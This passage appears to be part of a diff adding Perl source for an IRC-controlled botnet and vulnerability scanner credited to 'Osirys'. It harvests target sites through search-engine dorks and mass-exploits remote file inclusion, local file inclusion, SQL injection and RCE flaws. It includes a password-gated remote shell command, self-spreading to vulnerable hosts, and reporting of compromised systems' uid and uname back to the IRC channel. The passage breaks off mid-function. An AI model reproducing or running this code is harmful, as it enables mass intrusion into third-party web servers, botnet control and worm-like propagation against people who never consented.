+            pm($words[0],"15,1[-] 9,1Error Changing the RFI-Response (bad Password)!");
+        }
+        if (($line =~ /PRIVMSG $chan1 :!killme/)&&($securityACT == 0)) {
+            &killme($words[0]);
+        }
+        if (($line =~ /PRIVMSG $nick :!killme -p $killpwd/)&&($securityACT == 1)) {
+            &killme($words[0],"a");
+        }
+        elsif (($line =~ /PRIVMSG $nick :!killme -p $badkillpwd/)&&($securityACT == 1)) {
+            pm($words[0],"15,1[-] 12,4Error Killing the Bot (Null or bad Password) !");
+        }
+        if (($line =~ /PRIVMSG $chan1 :!admin (add|remove)\s+(.*)/)&&($securityACT == 0)) {
+            &ch_admin($1,$words[0],$2);
+        }
+        if (($line =~ /PRIVMSG $nick :!admin (add|remove)\s+(.*) -p $chadminpwd/)&&($securityACT == 1)) {
+            &ch_admin($1,$words[0],$2,"a");
+        }
+        elsif (($line =~ /PRIVMSG $nick :!admin (add|remove)\s+(.*) -p $badchadminpwd/)&&($securityACT == 1)) {
+            pm($words[0],"15,1[-] 12,4Error changing the Admin list (Null or bad Password) !");
+        }
+        if (($line =~ /PRIVMSG $chan1 :!cmd\s+(.*)/)&&($securityACT == 0)) {
+            &cmd($words[0],$1);
+        }
+        if (($line =~ /PRIVMSG $nick :!cmd\s+(.*) -p $cmdpwd/)&&($securityACT == 1)) {
+            &cmd($words[0],$1,"a");
+        }
+        elsif (($line =~ /PRIVMSG $nick :!cmd\s+(.*) -p $badcmdpwd/)&&($securityACT == 1)) {
+            pm($words[0],"15,1[-] 12,4Error using the shell (Null or bad Password) !");
+        }
+        if ($line =~ /PRIVMSG $nick :!Sec\s+(.*) -p $secpwd/) {
+            &sec($words[0],$1);
+        }
+        elsif ($line =~ /PRIVMSG $nick :!Sec\s+(.*) -p $badsecpwd/) {
+            pm($words[0],"15,1[-] 12,4Error changing the Security Mode (Null or bad Password) !");
+        }
+        if (($line =~ /PRIVMSG $chan1 :!Spread\s+(.*)/)&&($securityACT == 0)) {
+            &spread($words[0],$1);
+        }
+        if (($line =~ /PRIVMSG $nick :!Spread\s+(.*) -p $spreadpwd/)&&($securityACT == 1)) {
+            &spread($words[0],$1,"a");
+        }
+        elsif (($line =~ /PRIVMSG $nick :!Spread\s+(.*) -p $badspreadpwd/)&&($securityACT == 1)) {
+            pm($words[0],"15,1[-] 12,4Error changing the Spread Mode (Null or bad Password) !");
+        }
+        if ($line =~ /PRIVMSG $chan1 :!sspread -s\s+(.*)/) {
+            &sspread($words[0],$1);
+        }
+        if (($line =~ /PRIVMSG $chan1 :!rfi\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) {
+            &rfi_cheek($1,$2,$3,"s",$words[0]);
+        }
+        if (($line =~ /PRIVMSG $chan1 :!rfi\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) {
+            &rfi_cheek($1,$2,$3,"j");
+        }
+        if (($line =~ /PRIVMSG $chan1 :!lfi\s+(.*?)\s+(.*)/)&&($securityACT == 1)&&(fork() == 0)) {
+            &lfi_cheek($1,$2,$3,"s",$words[0]);
+        }
+        if (($line =~ /PRIVMSG $chan1 :!lfi\s+(.*?)\s+(.*)/)&&($securityACT == 0)&&(fork() == 0)) {
+            &lfi_cheek($1,$2,"j");
+        }
+        if (($line =~ /PRIVMSG $chan1 :!sql\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) {
+            &sql_cheek($1,$2,$3,"s",$words[0]);
+        }
+        if (($line =~ /PRIVMSG $chan1 :!sql\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) {
+            &sql_cheek($1,$2,$3,"j");
+        }
+        if (($line =~ /PRIVMSG $chan1 :!rce\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) {
+            &rce_cheek($1,$2,$3,"s",$words[0]);
+        }
+        if (($line =~ /PRIVMSG $chan1 :!rce\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) {
+            &rce_cheek($1,$2,$3,"j");
+        }
+        if (($line =~ /PRIVMSG $chan1 :!mass\[(rfi|lfi|sql|rce)\]\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) {
+            &mass_cheek($1,$2,$3,$4,"s",$words[0]);
+        }
+        if (($line =~ /PRIVMSG $chan1 :!mass\[(rfi|lfi|sql|rce)\]\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) {
+            &mass_cheek($1,$2,$3,$4,"j");
+        }
+    }
+}
+
+sub help() {
+    if ($securityACT == 0) {
+        @help;
+        foreach my $e(@help){
+            writ1("$e");
+        }
+    }
+    elsif ($securityACT == 1) {
+        @help;
+        $help[1]  = "15,1[*] 9,1/msg $nick !chid <new rfi-id> -p <pwd> 15,1 > 11,1Change the RFI-Response";
+        $help[2]  = "15,1[*] 9,1/msg $nick !killme 15,1 > -p <pwd> 11,1KILL The Bot";
+        $help[8]  = "15,1[*] 9,1!rfi <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the RFI Scanner";
+        $help[9]  = "15,1[*] 9,1!lfi <bug> <dork> 15,1 > 11,1Start the LFI Scanner";
+        $help[10] = "15,1[*] 9,1!sql <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the SQL Injection Scanner";
+        $help[11] = "15,1[*] 9,1!rce <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the RCE Scanner";
+        $help[12] = "15,1[*] 9,1!mass[rfi/lfi/sql/rce] <bug> <dork> -p <sites/proc> 15,1 > 11,1Start the Mass Scan";
+        $help[13] = "15,1[*] 9,1/msg $nick !cmd <bashline> -p <pwd> 15,1 > 11,1Gives command on the Bot's shell. Ex: (!cmd id) (!cmd uname -a)";
+        $help[14] = "15,1[*] 9,1/msg $nick !spread -s <RFI_Vuln_site> -p <pwd> 15,1 > 11,1To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)";
+        $help[15] = "15,1[*] 9,1/msg $nick !admin add/remove <nickname> -p <pwd> 15,1 > 11,1To add/remove a nickname to/from the admin list";
+        $help[16] = "15,1[*] 9,1/msg $nick !Sec ON/OFF -p <pwd> 15,1 > 11,1To enable or disable Security Mode";
+        $help[17] = "15,1[*] 9,1/msg $nick !Spread ON/OFF -p <pwd> 15,1 > 11,1To enable or disable Spread Mode";
+        $#help = 18;
+        writ1("4,1[!] Security Mode is ON. To use *commands you have to be an admin of the v6");
+        foreach my $e(@help){
+            writ1("$e");
+        }
+    }
+}
+
+sub info() {
+    @info;
+    foreach my $n(@info) {
+        writ1("$n");
+    }
+}
+
+sub response() {
+    my $re = query($id);
+    if ($re =~ /Osirys/) {
+        writ1("15,1[+] 12,9RFI Response is working !");
+    }
+    else {
+        writ1("15,1[-] 12,4RFI Response is NOT working !");
+    }
+}
+
+sub milw0rm() {
+    my $mlink = ("http://www.milw0rm.com/rss.php");
+    my $re = query($mlink);
+    my $l = -1;
+    while ($re =~ m/<title>(.+?)<\/title>/g){
+        my $title = $1;  $title =~ s/\&lt\;/</g;
+        if ($title !~ /milw0rm/) {
+            push(@ttot,$title);
+        }
+    }
+    while ($re =~ m/<link>(.+?)<\/link>/g) {
+        my $link = $1;
+        if ($link !~ /http:\/\/milw0rm.com\//) {
+            push(@ltot,$link);
+        }
+    }
+    writ1("15,1[+] 4,1Last Milw0rm bugs:");
+    foreach my $n(@ttot){
+        $l++;
+        writ1("15,1[+] 9,1$n4,1 -11,1 $ltot[$l]");
+    }
+}
+
+sub bug_update() {
+    my $kind = $_[0];
+    if ($kind =~ /rfi/) {
+        my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs
+        writ1("15,1[+] 9,1Last 10 RFI bugs:");
+        foreach my $n(@re) {
+            writ1(" 9,1$n ");
+        }
+    }
+    elsif ($kind =~ /lfi/) {
+        my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs
+        writ1("15,1[+] 9,1Last 10 LFI bugs:");
+        foreach my $n(@re) {
+            writ1(" 9,1$n ");
+        }
+    }
+    elsif ($kind =~ /sql/) {
+        my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs
+        writ1("15,1[+] 9,1Last 10 SQL-INJ bugs:");
+        foreach my $n(@re) {
+            writ1(" 9,1$n ");
+        }
+    }
+    elsif ($kind =~ /rce/) {
+        my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs
+        writ1("15,1[+] 9,1Last 10 RCE bugs:");
+        foreach my $n (@re) {
+            writ1(" 9,1$n ");
+        }
+    }
+}
+
+sub chid() {
+    my $nick = $_[0];
+    my $newid = $_[1];
+    my $reply = $_[2];
+    my $val = admin($nick);
+    if ($val == 1) {
+        $id = $newid;
+        if ($reply =~ /a/) {
+            pm($nick, "15,1[+] 9,1New RFI Response: $id");
+        }
+        writ1("15,1[+] 9,1RFI Response changed !");
+        writ1("15,1[+] 9,1New RFI Response: $id");
+    }
+    else {
+        pm($nick,"4,1[!] You are not authorized to execute this command!");
+    }
+}
+
+sub killme() {
+    my $nick = $_[0];
+    my $reply = $_[1];
+    my $val = admin($nick);
+    if ($reply =~ /a/) {
+        if ($val == 1) {
+            pm($nick, "15,1[!] 12,4Bye Bye !");
+            writ1("15,1[!] 12,4Bye Bye !");
+            print $c0n "QUIT";
+            exec("perl rm.txt && pkill perl \n");
+        }
+    }
+    else {
+        if ($val == 1) {
+            writ1("15,1[!] 12,4Bye Bye !");
+            print $c0n "QUIT";
+            exec("perl rm.txt && pkill perl \n"); 
+        }
+        else {
+            writ1("4,1[!] You are not authorized to execute this command!");
+        }
+    }
+}
+
+sub ch_admin() {
+    @admins;
+    my $command = $_[0];
+    my $nick = $_[1];
+    my $nick2 = $_[2];
+    my $mode = $_[3];
+    my $val = admin($nick);
+    if ($val == 1) {
+        if ($command =~ /add/) {
+            if ($mode =~ /a/) {
+                pm($nick,"15,1[+] 12,9$nick2 added in the Admin List!!");
+            }
+            push(@admins, $nick2);
+            writ1("15,1[+] 12,9$nick added $nick2 in the Admin List!!");
+        }
+        elsif ($command =~ /remove/) {
+            $t_adm = scalar(@admins);
+            foreach my $a(@admins){
+                if ($a eq $nick2) {
+                    $l = $t_adm +1;
+                    $a = $a[$l];
+                    $#admins = $t_adm;
+                }
+            }
+            if ($mode =~ /a/) {
+                pm($nick,"15,1[+] 12,9$nick2 removed from the Admin List!!");
+            }
+            writ1("15,1[+] 12,9$nick removed $nick2 from the Admin List!!");
+        }
+    }
+    else {
+        pm($nick,"4,1[!] You are not authorized to execute this command!");
+    }
+}
+
+sub cmd() {
+    my $nick = $_[0];
+    my $cmd = $_[1];
+    my $reply = $_[2];
+    my $val = admin($nick);
+    if ($val == 1) {
+        if ($reply =~ /a/) {
+            if ($cmd =~ /cd (.*)/) {
+                chdir($1) || pm($nick,"Can't change dir");
+                #return;
+            }
+            my @output = `$cmd`;
+            my $count = 0;
+            foreach my $out(@output) {
+                $count++;
+                if ($count == 10) {
+                    sleep(3);
+                    $count = 0;
+                }
+                pm($nick,"15,1[+] 7,1$out");
+            }
+        }
+        else {
+            if ($cmd =~ /cd (.*)/) {
+                chdir($1) || writ1("Can't change dir");
+                #return;
+            }
+            my @output = `$cmd`;
+            my $count = 0;
+            foreach my $out(@output) {
+                $count++;
+                if ($count == 10) {
+                    sleep(3);
+                    $count = 0;
+                }
+                writ1("15,1[+] 7,1$out ");
+            }
+        }
+    }
+    else {
+        pm($nick,"4,1[!] You are not authorized to execute this command!");
+    }
+}
+
+sub sec() {
+    my $nick = $_[0];
+    my $mode = $_[1];
+    my $val = admin($nick);
+    if ($val == 1) {
+        if ($mode =~ /ON/) {
+            $securityACT = 1;
+            sleep(2);
+            pm($nick,"15,1[+] 12,9Security Mode Activated !!");
+            writ1("15,1[+] 12,9Security Mode Activated !!");
+        }
+        elsif ($mode =~ /OFF/) {
+            $securityACT = 0;
+            sleep(2);
+            pm($nick,"15,1[+] 12,4Security Mode Disabled !!");
+            writ1("15,1[+] 12,4Security Mode Disabled !!");
+        }
+    }
+}
+
+sub spread() {
+    my $nick = $_[0];
+    my $mode = $_[1];
+    my $reply = $_[2];
+    my $val = admin($nick);
+    if ($val == 1) {
+        if ($mode =~ /ON/) {
+            $spreadACT = 1;
+            sleep(2);
+            if ($reply =~ /a/) {
+                pm($nick, "15,1[+] 12,9Spread Mode Activated !!");
+            }
+            writ1("15,1[+] 12,9Spread Mode Activated !!");
+        }
+        elsif ($mode =~ /OFF/) {
+            $spreadACT = 0;
+            sleep(2);
+            if ($reply =~ /a/) {
+                pm($nick, "15,1[+] 12,4Spread Mode Disabled !!");
+            }
+            writ1("15,1[+] 12,4Spread Mode Disabled !!");
+        }
+    }
+    else {
+        pm($nick,"4,1[!] You are not authorized to execute this command!");
+    }
+}
+
+sub sspread() {
+    my $nick = $_[0];
+    my $host = $_[1];
+    my $val = admin($nick);
+    if ($val == 1) {
+        my $host =~ s/http:\/\///;
+        writ1("15,1[+] 9,1Trying to spread on $host ..");
+        my $tspread = "http://".$host.$spread."?";
+        &query($tspread);
+    }
+    else {
+        writ1("4,1[!] You are not authorized to execute this command!");
+    }
+}
+
+sub rfi_cheek() {
+    my $bug = $_[0];
+    my $dork = $_[1];
+    my $rfipid = $_[2];
+    my $chek = $_[3];
+    my $nick = $_[4];
+    if ($chek =~ /j/) {
+        &rfi_scan($bug, $dork, $rfipid);
+    }
+    elsif ($chek =~ /s/) {
+        my $val = admin($nick);
+        if ($val == 1) {
+            &rfi_scan($bug, $dork, $rfipid);
+        }
+        else {
+            writ1("4,1[!] You are not authorized to execute this command!");
+        }
+    }
+}
+
+sub rfi_scan() {
+    my $bug = $_[0];
+    my $dork = $_[1];
+    my $rfipid = $_[2];
+    writ1("4,1[*] 9,1RFI Scan started -> $rfipid sites/process");
+    writ1("9,1[+] Bug: $bug");
+    $d0rk = clean($dork);
+    writ1("4,1[+] Dork: $d0rk");
+    my $a    = $k . "a";
+    my $n4me = $a . "siti.txt";
+    find($d0rk, $n4me);
+    rfi($bug, $n4me, $d0rk, $rfipid);
+    writ1("4,1[-] RFI Scan finished 9,1 >15,1 $d0rk");
+    writ1("11,1[й] # Coded by Osirys");
+    exit(0);
+}
+
+sub lfi_cheek() {
+    my $bug = $_[0];
+    my $dork = $_[1];
+    my $chek = $_[2];
+    my $nick = $_[3];
+    if ($chek =~ /j/) {
+        &lfi_scan($bug, $dork);
+    }
+    elsif ($chek =~ /s/) {
+        my $val = admin($nick);
+        if ($val == 1) {
+            &lfi_scan($bug, $dork);
+        }
+        else {
+            writ1("4,1[!] You are not authorized to execute this command!");
+        }
+    }
+}
+
+sub lfi_scan() {
+    my $bug = $_[0];
+    my $dork = $_[1];
+    writ1("4,1[*] 7,1LFI Scan started ");
+    writ1("9,1[+] Bug: $bug");
+    $d0rk = clean($dork);
+    writ1("4,1[+] Dork: $d0rk");
+    my $b    = $k . "b";
+    my $n4me = $b . "siti.txt";
+    find($d0rk, $n4me);
+    lfi($bug, $n4me, $d0rk);
+    writ1("4,1[-] LFI Scan finished 9,1 >15,1 $d0rk");
+    writ1("11,1[й] # Coded by Osirys");
+    exit(0);
+}
+
+sub sql_cheek() {
+    my $bug = $_[0];
+    my $dork = $_[1];
+    my $sqlpid = $_[2];
+    my $chek = $_[3];
+    my $nick = $_[4];
+    if ($chek =~ /j/) {
+        &sql_scan($bug, $dork, $sqlpid);
+    }
+    elsif ($chek =~ /s/) {
+        my $val = admin($nick);
+        if ($val == 1) {
+            &sql_scan($bug, $dork, $sqlpid);
+        }
+        else {
+            writ1("4,1[!] You are not authorized to execute this command!");
+        }
+    }
+}
+
+sub sql_scan() {
+    my $bug = $_[0];
+    my $dork = $_[1];
+    my $sqlpid = $_[2];
+    writ1("4,1[*] 15,1SQL Inj Scan started -> $sqlpid sites/process");
+    writ1("9,1[+] Bug: $bug");
+    $d0rk = clean($dork);
+    writ1("4,1[+] Dork: $d0rk");
+    my $c    = $k . "c";
+    my $n4me = $c . "siti.txt";
+    find($d0rk, $n4me);
+    sql($bug, $n4me, $d0rk, $sqlpid);
+    writ1("4,1[-] SQL Scan finished 9,1 >15,1 $d0rk");
+    writ1("11,1[й] # Coded by Osirys");
+    exit(0);
+}
+
+sub rce_cheek() {
+    my $bug = $_[0];
+    my $dork = $_[1];
+    my $rcepid = $_[2];
+    my $chek = $_[3];
+    my $nick = $_[4];
+    if ($chek =~ /j/) {
+        &rce_scan($bug, $dork, $rcepid);
+    }
+    elsif ($chek =~ /s/) {
+        my $val = admin($nick);
+        if ($val == 1) {
+            &rce_scan($bug, $dork, $rcepid);
+        }
+        else {
+            writ1("4,1[!] You are not authorized to execute this command!");
+        }
+    }
+}
+
+sub rce_scan() {
+    my $bug = $_[0];
+    my $dork = $_[1];
+    my $rcepid = $_[2];
+    writ1("4,1[*] 0,12RCE Scan started -> $sqlpid sites/process");
+    writ1("9,1[+] Bug: $bug");
+    $d0rk = clean($dork);
+    writ1("4,1[+] Dork: $d0rk");
+    my $c    = $k . "c";
+    my $n4me = $c . "siti.txt";
+    find($d0rk, $n4me);
+    rce($bug, $n4me, $d0rk, $sqlpid);
+    writ1("4,1[-] RCE Scan finished 9,1 >15,1 $d0rk");
+    writ1("11,1[й] # Coded by Osirys");
+    exit(0);
+}
+
+sub mass_cheek() {
+    my $kind = $_[0];
+    my $bug = $_[1];
+    my $dork = $_[2];
+    my $mpid = $_[3];
+    my $chek = $_[4];
+    my $nick = $_[5];
+    if ($chek =~ /j/) {
+        &mass_scan($kind, $bug, $dork, $mpid);
+    }
+    elsif ($chek =~ /s/) {
+        my $val = admin($nick);
+        if ($val == 1) {
+            &mass_scan($kind, $bug, $dork, $mpid);
+        }
+        else {
+            writ1("4,1[!] You are not authorized to execute this command!");
+        }
+    }
+}
+
+sub mass_scan() {
+    my $kind = $_[0];
+    my $bug = $_[1];
+    my $dork = $_[2];
+    my $mpid = $_[3];
+    my @engine;
+    my $c = $k."MASS";
+    my $n4me = $c."siti.txt";
+    my $g = $k."G";   my $a = $k."A";   my $y = $k."Y";   my $m = $k."M";
+    my $gname = $g."siti.txt";
+    my $aname = $a."siti.txt";
+    my $yname = $y."siti.txt";
+    my $mname = $m."siti.txt";
+    my $gtest = ("www.google.com/search?q=hi&hl=en&start=10&sa=N");
+    my $ytest = ("http://it.search.yahoo.com/search?p=ciao&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=r&fl=0&fr=yfp-t-501&pstart=1&b=0");
+    my $re = query1($gtest);  my $re2 = query($ytest);
+    if (($re !~ /Google Home/)&&($re2 !~ /<p>1 - 100 di circa/)) {
+        writ1("4,1[*] 12,1MASS[9,1$kind12,1] SCAN STARTED ON ALLTHEWEB/MSN (Google&Yahoo banned) -> $mpid sites/process");
+        writ1("9,1[+] Bug: $bug");
+        writ1("4,1[+] Dork: $dork");
+        $engine[0] = fork();
+        if ($engine[0] == 0) {
+            &M_Super($dork, $mname);
+            exit(0);
+        }
+        $engine[1] = fork();
+        if ($engine[1] == 0) {
+            &A_Super($dork, $aname);
+            exit(0);
+        }
+        foreach my $e(@engine){
+            waitpid($e,0);
+        }
+        open($file, ">>", $n4me);  open(Alltheweb,"<",$aname);  open(Msn,"<",$mname);
+        foreach my $e(<Alltheweb>){
+            print $file "$e\n";
+        }
+        foreach my $e(<Msn>){
+            print $file "$e\n";
+        }
+        close(Alltheweb);  close(Msn);  close($file);
+        remove($aname,$mname);
+    }
+    elsif (($re =~ /Google Home/)&&($re2 !~ /<p>1 - 100 di circa/)) {
+        writ1("4,1[*] 12,1MASS[9,1$kind12,1] SCAN STARTED ON GOOGLE/ALLTHEWEB/MSN (Yahoo banned) -> $mpid sites/process");
+        writ1("9,1[+] Bug: $bug");
+        writ1("4,1[+] Dork: $dork");
+        $engine[0] = fork();
+        if ($engine[0] == 0) {
+            &G_Super($dork, $gname);
+            exit(0);
+        }
+        $engine[1] = fork();
+        if ($engine[1] == 0) {
+            &M_Super($dork, $mname);
+            exit(0);
+        }
+        $engine[2] = fork();
+        if ($engine[2] == 0) {
+            &A_Super($dork, $aname);
+            exit(0);
+        }
+        foreach my $e(@engine){
+            waitpid($e,0);
+        }
+        open($file, ">>", $n4me);  open(Google,"<",$gname);  open(Alltheweb,"<",$aname);  open(Msn,"<",$mname);
+        foreach my $e(<Google>){
+            print $file "$e\n";
+        }
+        foreach my $e(<Alltheweb>){
+            print $file "$e\n";
+        }
+        foreach my $e(<Msn>){
+            print $file "$e\n";
+        }
+        close(Alltheweb);  close(Google);  close(Msn);  close($file);
+        remove($gname,$aname,$mname);
+    }
+    elsif (($re !~ /Google Home/)&&($re2 =~ /<p>1 - 100 di circa/)) {
+        writ1("4,1[*] 12,1MASS[9,1$kind12,1] SCAN STARTED ON ALLTHEWEB/YAHOO/MSN (Google banned) -> $mpid sites/process");
+        writ1("9,1[+] Bug: $bug");
+        writ1("4,1[+] Dork: $dork");
+        $engine[0] = fork();
+        if ($engine[0] == 0) {
+            &Y_Super($dork, $yname);
+            exit(0);
+        }
+        $engine[1] = fork();
+        if ($engine[1] == 0) {
+            &M_Super($dork, $mname);
+            exit(0);
+        }
+        $engine[2] = fork();
+        if ($engine[2] == 0) {
+            &A_Super($dork, $aname);
+            exit(0);
+        }
+        foreach my $e(@engine){
+            waitpid($e,0);
+        }
+        open($file, ">>", $n4me);  open(Yahoo,"<",$yname);  open(Alltheweb,"<",$aname);  open(Msn,"<",$mname);
+        foreach my $e(<Yahoo>){
+            print $file "$e\n";
+        }
+        foreach my $e(<Alltheweb>){
+            print $file "$e\n";
+        }
+        foreach my $e(<Msn>){
+            print $file "$e\n";
+        }
+        close(Alltheweb);  close(Yahoo);  close(Msn);  close($file);
+        remove($yname,$aname,$mname);
+    }
+    elsif (($re =~ /Google Home/)&&($re2 =~ /<p>1 - 100 di circa/)) {
+        writ1("4,1[*] 12,1MASS[9,1$kind12,1] SCAN STARTED ON GOOGLE, ALLTHEWEB, YAHOO, MSN -> $mpid sites/process");
+        writ1("9,1[+] Bug: $bug");
+        writ1("4,1[+] Dork: $dork");
+        $engine[0] = fork();
+        if ($engine[0] == 0) {
+            &G_Super($dork, $gname);
+            exit(0);
+        }
+        $engine[1] = fork();
+        if ($engine[1] == 0) {
+            &Y_Super($dork, $yname);
+            exit(0);
+        }
+        $engine[2] = fork();
+        if ($engine[2] == 0) {
+            &M_Super($dork, $mname);
+            exit(0);
+        }
+        $engine[3] = fork();
+        if ($engine[3] == 0) {
+            &A_Super($dork, $aname);
+            exit(0);
+        }
+        foreach my $e(@engine){
+            waitpid($e,0);
+        }
+        open($file, ">>", $n4me);  open(Google,"<", $gname);  open(Yahoo,"<",$yname);  open(Alltheweb,"<",$aname);  open(Msn,"<",$mname);
+        foreach my $e(<Google>){
+            print $file "$e\n";
+        }
+        foreach my $e(<Alltheweb>){
+            print $file "$e\n";
+        }
+        foreach my $e(<Yahoo>){
+            print $file "$e\n";
+        }
+        foreach my $e(<Msn>){
+            print $file "$e\n";
+        }
+        close(Alltheweb);  close(Yahoo);  close(Google);  close(Msn);  close($file);
+        remove($yname,$aname,$gname,$mname);
+    }
+    foreach my $e(@engine){
+        waitpid($e,0);
+    }
+    sleep(5);
+    if ($kind =~ /rfi/) {
+        rfi($bug, $n4me, $dork, $mpid);
+    }
+    elsif ($kind =~ /lfi/) {
+        lfi($bug, $n4me, $dork);
+    }
+    elsif ($kind =~ /sql/) {
+        sql($bug, $n4me, $dork, $mpid);
+    }
+    elsif ($kind =~ /rce/) {
+        rce($bug, $n4me, $dork, $mpid);
+    }
+    writ1("4,1[-] 12,1MASS[9,1$kind12,1] SCAN FINESHED 9,1 >15,1 $dork");
+    writ1("11,1[й] # Coded by Osirys ");
+    exit(0);
+}
+
+sub find() {
+    my $dork = $_[0];
+    my $name = $_[1];
+    my @engine;
+    $engine[0] = fork();
+    if ($engine[0] == 0) {
+       my @lycos = lycos($dork,$name);
+        writ1("9,1[~] 7,1>LYCOS : 11,1 ".scalar(@lycos)." 9,1 > 15,1 $dork");
+        exit(0);
+    }
+    $engine[1] = fork();
+   if ($engine[1] == 0) {
+        my @msn = msn($dork, $name);
+        writ1("9,1[~] 7,1>MSN : 11,1 ". scalar(@msn). " 9,1 > 15,1 $dork");
+        exit(0);
+    }
+    $engine[2] = fork();
+    if ($engine[2] == 0) {
+        my @yahoo = yahoo($dork, $name);
+        writ1("9,1[~] 7,1>YAHOO : 11,1 ". scalar(@yahoo). " 9,1 > 15,1 $dork");
+        exit(0);
+    }
+    $engine[3] = fork();
+    if ($engine[3] == 0) {
+        my @google = google($dork, $name);
+        writ1("9,1[~] 7,1>GOOGLE : 11,1 ". scalar(@google). " 9,1 > 15,1 $dork");
+        exit(0);
+    }
+    $engine[4] = fork();
+    if ($engine[4] == 0) {
+        my @allthewebe = alltheweb($dork, $name);
+        writ1("9,1[~] 7,1>ALLTHEWEB : 11,1 ". scalar(@allthewebe). " 9,1 > 15,1 $dork");
+        exit(0);
+    }
+    $engine[5] = fork();
+    if ($engine[5] == 0) {
+        my @virgilio = virgilio($dork, $name);
+        writ1("9,1[~] 7,1>VIRGILIO : 11,1 ". scalar(@virgilio). " 9,1 > 15,1 $dork");
+        exit(0);
+    }
+    $engine[6] = fork();
+    if ($engine[6] == 0) {
+        my @altavista = altavista($dork, $name);
+        writ1("9,1[~] 7,1>ALTAVISTA : 11,1 ". scalar(@altavista). " 9,1 > 15,1 $dork");
+        exit(0);
+    }
+    $engine[7] = fork();
+    if ($engine[7] == 0) {
+        my @ask = ask($dork, $name);
+        writ1("9,1[~] 7,1>ASK : 11,1 ". scalar(@ask). " 9,1 > 15,1 $dork");
+        exit(0);
+    }
+    $engine[8] = fork();
+    if ($engine[8] == 0) {
+        my @webde = webde($dork,$name);
+        writ1("9,1[~] 7,1>WEB.DE : 11,1 ". scalar(@webde). " 9,1 > 15,1 $dork");
+        exit(0);
+    }
+    $engine[9] = fork();
+    if ($engine[9] == 0) {
+       my @uol = uol($dork,$name);
+       writ1("9,1[~] 7,1>UOL : 11,1 ".scalar(@uol)." 9,1 > 15,1 $dork");
+        exit(0);
+    }
+   $engine[10] = fork();
+   if ($engine[10] == 0) {
+        my @abacho = abacho($dork,$name);
+        writ1("9,1[~] 7,1>ABACHO : 11,1 ".scalar(@abacho)." 9,1 > 15,1 $dork");
+        exit(0);
+    }
+    foreach my $e(@engine){
+        waitpid($e,0);
+    }
+
+}
+
+sub rfi() {
+    my $bug  = $_[0];
+    my $name = $_[1];
+    my $dork = $_[2];
+    my $rfipid = $_[3]; 
+    my @forks;
+    my $num = 0;
+    open($file, "<", $name);
+    while (my $a = <$file>) {
+        $a =~ s/\n//g;
+        push(@tot,$a);
+    }
+    close($file);
+    remove($name);
+    my @toexploit = unici(@tot);
+    writ1("9,1[*] 4,1>EXPLOITABLES:   11,1 ".scalar(@toexploit)."   15,1 $dork");
+    sleep(1);
+    writ1("4,1[+] 9,1ExPLoItIng STARTED !! ");
+    foreach my $site(@toexploit) {
+        my $test  = "http://".$site.$bug.$id."??";
+        $count++;
+        if ($count % $rfipid == 0) {
+            foreach my $f(@forks){
+                waitpid($f,0);
+            }
+            $num = 0;
+        }
+        if($count %100 == 0){
+            writ1("9,1[%] 15,1 _/ 11,1Exploiting   4,1 ".$count." 11,1 / 4,1 ".scalar(@toexploit)." ");
+        }
+        $forks[$num]=fork();
+        if($forks[$num] == 0){
+            my $test  = "http://".$site.$bug.$id."??";
+            my $print = "http://".$site.$bug.$shell."?";
+            my $re    = query($test);
+            if ($re =~ /Osirys/ && $re =~ /uid=/) {
+                os($test);
+                writ1("12(12,9safe: OFF12) (12,9os: $os12) 12,9$print");
+                writ1("12(12,9uname -a12) 12 $un");
+                writ1("12(12,9uid / gid12) 12 $id1");
+                writ1("12(12,9hdd space12) 12 free: ($free) used: ($used) tot: ($all)");
+                writ2("");
+                writ2("12(12,9safe: OFF12) (12,9os: $os12) 12,9$print");
+                writ2("12(12,9uname -a12) 12 $un 12(12,9uid12)12 $id1");
+                if ($spreadACT == 1) {
+                    writ1("15,1[+] 9,1Trying to spread ..");
+                    sleep(2);
+                    my $test2 = "http://".$site.$bug.$spread."?";
+                    &query($test2);
+                }
+            }
+            elsif ($re =~ /Osirys/) {
+                os($test);
+                writ1("12(12,4safe: ON12) (12,4os: $os12) 12,4$print");
+                writ1("12(12,4uname -a12) 12 $un");
+                writ1("12(12,4hdd space12) 12 free: ($free) used: ($used) tot: ($all)");
+                writ2("");
+                writ2("12(12,4safe: ON12) (12,4os: $os12) 12,4$print");
+                if ($spreadACT == 1) {
+                    writ1("15,1[+] 9,1Trying to spread ..");
+                    sleep(2);
+                    my $test2 = "http://".$site.$bug.$spread."?";
+                    &query($test2);
+                }
+            }
+            exit(0);
+        }
+        $num++;
+    }
+    foreach my $f(@forks){
+        waitpid($f,0);
+    }
+}
+
+sub lfi() {
+    my $bug  = $_[0];
+    my $name = $_[1];
+    my $dork = $_[2];
+    my @forks;
+    my $num = 0;
+    open($file, "<", $name);
+    while (my $a = <$file>) {
+        $a =~ s/\n//g;
+        push(@tot, $a);
+    }
+    close($file);
+    remove($name);
+    my @toexploit = unici(@tot);
+    writ1("9,1[*] 4,1>EXPLOITABLES:   11,1 ".scalar(@toexploit)."   15,1 $dork");
+    writ1("4,1[+] 9,1ExPLoItIng STARTED !! ");
+    foreach my $site(@toexploit) {
+        $count++;
+        if ($count % 100 == 0) {
+            foreach my $f(@forks){
+                waitpid($f,0);
+            }
+            $num = 0;
+        }
+        if ($count % 300 == 0) {
